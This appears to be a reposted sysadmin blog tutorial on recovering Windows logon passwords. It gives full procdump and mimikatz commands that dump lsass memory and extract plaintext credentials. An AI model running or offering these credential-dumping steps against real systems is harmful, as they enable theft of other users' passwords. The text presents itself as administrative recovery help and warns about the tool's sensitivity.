Windows: Recover lost passwords from memory

from–https://michlstechblog.info/blog/windows-recover-lost-passwords-from-memory/

 

Hi,

if a User is logged on and forget it’s password you can dump to lsa process and recover the password from a dump file.

Two tools are needed:

  • Microsoft’s sysinternals procdump
  • mimikatz. A tool to play with windows security. Take care when download precompiled binaries. Better get the source code from github and compile it yourself.  Its very easy

Lets start. Login as a User with administrator permissions and dump the lsass process

C:\>procdump.exe -accepteula -ma lsass.exe %TEMP%\lsass.dmp
ProcDump v7.1 - Writes process dump files
Copyright (C) 2009-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards[09:53:48] Dump 1 initiated: C:\Users\user\AppData\Local\Temp\lsass.dmp
[09:53:55] Dump 1 writing: Estimated dump file size is 42 MB.
[09:53:55] Dump 1 complete: 42 MB written in 7.5 seconds
[09:53:56] Dump count reached.

Recover the lost information. Start mimikatz interactive shell

C:\> mimikatz.exe

To Get help type double :: respectively for a module sekurlsa::
Open dmp file
mimikatz # sekurlsa::minidump C:\Users\user\AppData\Local\Temp\lsass.dmp
Switch to MINIDUMP : 'C:\Users\user\AppData\Local\Temp\lsass.dmp'

And get the lost information

mimikatz # sekurlsa::logonPasswords

Mimikatz also supports Windows full- and crashdumps and  VMware vmem as input. To extract it from a memory dump or a hibernation file use the mimikatz offline plugin for volatility.

It’ s also possible to recover the login credentials directly from the lsass process. This is the default.

You have to get debug privileges to do this otherwise a ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) occurs and also mimikatz.exe must be compiled for the used OS Version (x86 or x64, Error: ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations)
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonPasswords

CAUTION: Be very carefully be when using this tool, because you can make visible extreme sensitive data!!! Maybe in your work or country this tool is classified as hacker tool!!!

Michael

上一篇
下一篇